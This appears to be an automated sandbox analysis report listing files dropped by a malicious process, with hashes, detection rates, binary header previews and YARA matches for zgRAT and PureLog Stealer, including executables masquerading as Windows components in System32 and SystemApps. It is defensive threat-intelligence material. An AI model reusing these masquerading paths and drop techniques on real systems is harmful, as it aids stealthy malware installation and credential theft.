                                                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                            MD5:87765D141228784AE91334BAE25AD743
                                                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\RjQGfYMX.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):46592
                                                                                            Entropy (8bit):5.870612048031897
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\WfRXmDCR.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38912
                                                                                            Entropy (8bit):5.679286635687991
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\cXuwPjHF.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):36352
                                                                                            Entropy (8bit):5.668291349855899
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\gOlnWgHy.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                            C:\Users\user\Desktop\hLMvsgWt.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\mGNMzMMn.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):50176
                                                                                            Entropy (8bit):5.723168999026349
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\nuSUkZIl.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\poUkcZma.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33792
                                                                                            Entropy (8bit):5.541771649974822
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\vphcjoRU.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):34304
                                                                                            Entropy (8bit):5.618776214605176
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\yaMsqCcN.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):40448
                                                                                            Entropy (8bit):5.7028690200758465
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Users\user\Desktop\zXoALCrI.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):34816
                                                                                            Entropy (8bit):5.636032516496583
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                            C:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1224
                                                                                            Entropy (8bit):4.435108676655666
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                            C:\Windows\System32\SecurityHealthSystray.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.9379462519300814
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:69jp/PttM7Jt8Bs3FJsdcV4MKe27JdTRPvqBHSOulajfqXSfbNtm:YPkPc+Vx9MBPvk8cjRzNt
                                                                                            MD5:9DFA569D675CDA2E8C31DE1F651AAF16
                                                                                            SHA1:96DD3DD5EF422E733E2ED435E653E4798B094A95
                                                                                            SHA-256:AEAAF72273B4CD34276D7C7BFF9FA222B83A4D42C115967E9355C89BA283DBFA
                                                                                            SHA-512:818E95B7CB980BE48B24AC935DEB87A6BFCCDBCB25B4E1B52A47B8A344B50BA1B903309EFA5BF9610A7BB860F8BB71248DCA35613DBD4032777E80235B9FCB78
                                                                                            Malicious:true
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g.............................'... ...@....@.. ....................................@.................................H'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!.. .............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                            C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\6ccacd8608530f

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):114
                                                                                            Entropy (8bit):5.595760027524405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:eRwY9Q/yfzfDCR1ow5gcDIo+xVEGS6Xn:eR9yE2zZs7jEQXn
                                                                                            MD5:164CE56DBC705CC0DD96DEB5E911EAA0
                                                                                            SHA1:774CD2CD02045626C0C816371D0BEC3165812AF3
                                                                                            SHA-256:D00B953E79210C776E6408D925F5CD8E0500E502BE9575A58826F078A7105D9F
                                                                                            SHA-512:C7A60EEA6BB217310601D3C8067AB3B9BE3D06B5478E684D92AA99F8903C639095733F1EB48EA0EC2AD21A8DF46FA81B1EA2FF54E490768AD2E85A278A5C1020
                                                                                            Malicious:false
                                                                                            Preview:BP1tWFQ1aRhlKJm456WeWbICvzG5znS8yuFO5tPYlGuOTpQ0O24YaKujHz7h9VCw8jwZEX9Mr82Pr3tFiPq6s4hnAfHGvrZQE7Pt21w03sqcRe2NG2

                                                                                            C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................X$.........Nw$.. ....$...@.. ........................$...........@..................................w$.K.....$. .....................$...................................................... ............... ..H............text...TW$.. ...X$................. ..`.rsrc... .....$......Z$.............@....reloc........$......^$.............@..B................0w$.....H........... ...................vv$......................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{r...:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............l.......\.......8....r...ps....z*~....(\... .... .... ....s....~....(`....... ....~....{z...:....& ....8.......... ....8w...~....9.... ....~....{....:Y...& ....8N...8v... ....8?.......~....(d...~....(h... ....?J..

                                                                                            C:\agentwebreviewDhcp\24dbde2999530e

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (402), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):402
                                                                                            Entropy (8bit):5.856540162612455
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ue+w0UnX91RmLEm5CSiyvmCwBZxSzcN8X24m1PRX1zdCi5GAx+MFfAYFcs14T+uD:ueF0UULUuOiEtx1PN1zdt7vFfKUB+
                                                                                            MD5:D641179E570E5ABBA147E9DFA559684F
                                                                                            SHA1:C7797BD1221A0CE3EC25F5618FEE47234B67B4C2
                                                                                            SHA-256:CB4957F0BDF9124595A5DD403CEA3A7E827FE705A166FB529AB30D5A3B4A973A
                                                                                            SHA-512:31B2470763921549075B80268FBF496313875D29AE04224DDC16668B57F043E7E7EF0D6BE0E36823F3F21928A4DF3FC2316EE41E9743FEAB5D94E4A90D07DD0F
                                                                                            Malicious:false
                                                                                            Preview:iQ3aAimLun9Nqd0DANEWgn4A3rql93LqtdNk9Sp3pTHjGoSPyBD07w25W3gS2AM0cTeNPPDshLqNfU3PZax70Ut6kSOGvXBoGRGxKF9i7VTwFpZB9R3bNOAIjhm7B76KJCGNOGFUbO9eB7052MHedjb1R8NmcChAYImDiLx2MjA8PfHmrrFyzcqklO6P3c1Yr9F2VwWqZOS4jdmv1l4u7sK6bBcUPh8trlQPZOQ4VYYlJwBIlLYSiHb8yIaTUBb2QiM7MXVmU9ZiUjwpAUsDIqLkJRaRx7kT7fUljD5Ozw8is3oPVvSATXujXmx56EyWZFkyOLF6YeOVsm1QmL5CojAkuvN6QARu7lImS0BKpVlzIY1uvhSvJwrzFADd7JqYMdYGeP7wKvWT8KbV4d

                                                                                            C:\agentwebreviewDhcp\4d0172bd2e8d5a

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (613), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):613
                                                                                            Entropy (8bit):5.8756556186778734
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:gQBKqHhUw0yxU8eTTCioF1GQCSsw7Qk8/nPlBx/3/RCquwmdVV:nHGwlxU8eiioda5lf3Mqut
                                                                                            MD5:DBC9EF5E342602A887A6E2C0B8823B75
                                                                                            SHA1:42F7AF22FB21F2FCBB3E4990B0D332D82216BB8E
                                                                                            SHA-256:B15A1F8EB70C8645873E67BFA43434CF6B7A6AB70BDDFFD13678BE9FD130967D
                                                                                            SHA-512:9F8E2FEB45124E145350A93F735396EBE281C40461CECDC33772796B59997FFE540FC64286080FB1E989BF42DB6502E7172A5D3EE6A91002B9303DC4656624AF
                                                                                            Malicious:false
